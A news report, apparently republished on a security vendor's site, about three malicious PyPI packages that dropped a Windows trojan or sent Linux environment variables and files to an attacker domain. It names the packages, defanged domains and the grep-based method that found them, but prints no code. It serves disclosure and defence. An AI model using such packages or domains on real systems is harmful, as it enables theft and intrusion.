Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

Malicious PyPI Packages with Over 10,000 Downloads Taken Down

Malicious PyPI Packages with Over 10,000 Downloads Taken Down

The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines.

These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers’ report.

Large scale static analysis led to a malicious discovery

This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.

These malicious packages, shown below, have altogether been downloaded and mirrored almost 15,000 times.

The first version of dpp-client surfaced on PyPI around February 13th, 2021, and the one for dpp-client1234 on the 14th. Whereas, the first version of aws-login0tool appeared more recently, on December 1st.

Also Read: NDA Data Protection: The Importance, Its Meaning And Laws

Package nameMaintainerDescriptionDownload counts*
aws-login0tooldavycrockett5729492Typosquatting candidate, drops Trojan (EXE) on Windows3,042
dpp-clientcutoffurmind (Alex)Exfiltrates environment variables (Unix) and files10,194
dpp-client1234cutoffurmind (Alex)Exfiltrates environment variables (Unix) and files1,536

*Download counts aggregated from PyPIstats and Pepy.tech may include (automated) mirrors, in addition to organic downloads by developers.

While performing large-scale static analysis of “a large percentage of the packages on PyPI,” Scott came across these mysterious-looking packages.

“I caught these primarily through manual inspection of setup.py files that matched various suspicion strings and regex patterns I was looking for,” Scott tells BleepingComputer in an email interview.

“For example, most cases of exec were benign, but it’s a risky method to use, and commonly leveraged by attackers crafting malicious packages.”

To aid in his research, Scott made use of the Python Packaging Authority’s Bandersnatch open source project.

“Once I had a large number of the package distributions downloaded, I needed to extract them for easier analysis. I put together a pretty simple Python script to recursively iterate through Bandersnatch’s somewhat complicated folder structure then decompressed and extracted each sdistegg, or wheel out to a flat directory,” explains the developer in his blog post.

After extracting the packages, the developer ran a series of string and regex-based search operations via the grep utility and manually reviewed the results.

“The outcome of this simple approach was actually pretty impactful.”

Also Read: Invasion Of Privacy Elements And Its Legal Laws To Comply

Targets Windows PCs, Linux distros running Apache Mesos

The aws-login0tool package targets Windows machines and downloads a malicious 64-bit executable, normal.exe from the tryg[.]ga domain.

The malicious executable has been identified as a trojan by 38% of the antivirus engines on VirusTotal, as of writing:

aws-login0tool code
aws-login0tool drops malicious EXE (BleepingComputer)

On the contrary, dpp-client and dpp-client1234 target Linux systems and peek into environment variables, directory listing, and exfiltrate this information to the pt.traktrain[.]com domain.

These packages attempt to pry on select few directories including /mnt/mesos, indicating that the malware is specifically looking for files related to Apache Mesos, an open source cluster management product.

dpp-client code
Source code of one of the dpp-client versions (BleepingComputer)

What remains a mystery is a large number of downloads and mirrors for these packages.

On a first glance, aws-login0tool appears to be a typosquatting attempt as the developer points out—’0′ and ‘-‘ keys being present next to each other on most keyboards. However, BleepingComputer is not aware of an active PyPI package named ‘aws-login-tool’ that a clever attacker might be tempted to impersonate. Although, one may have existed in the past.

BleepingComputer also observed the PyPI page for aws-login0tool, when alive, contained an explicit disclaimer instructing the user to not download the package:

“Please don’t use this… It does bad things… Oh, dear :(“

PyPI download page for aws-login0tool
PyPI page for the now-removed malicious aws-login0tool package (BleepingComputer)

Likewise, project pages for dpp-client and dpp-client1234 packages, as seen by BleepingComputer, contained a simple “test” keyword in their description insinuating that were, quite likely part of a proof-of-concept exercise.

This development follows ongoing instances of malware and unwanted content targeting open source repositories like PyPI, npm, and RubyGems.

Last month, JFrog security research team had reported catching Discord info-stealers among other malicious PyPI packages that abused a “novel exfiltration” technique.

The same month, I wrote about a malicious PyPI package that made a crude attempt at typosquatting ‘boto3’—the Amazon Web Services SDK for Python.

July this year, six malicious PyPI packages were also caught mining cryptocurrency on developer machines.

Fortunately, the three aforementioned packages discovered by Scott were reported to PyPI admins on December 10th and removed swiftly.

Update 07:26 AM ET: Added quote from Scott.

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us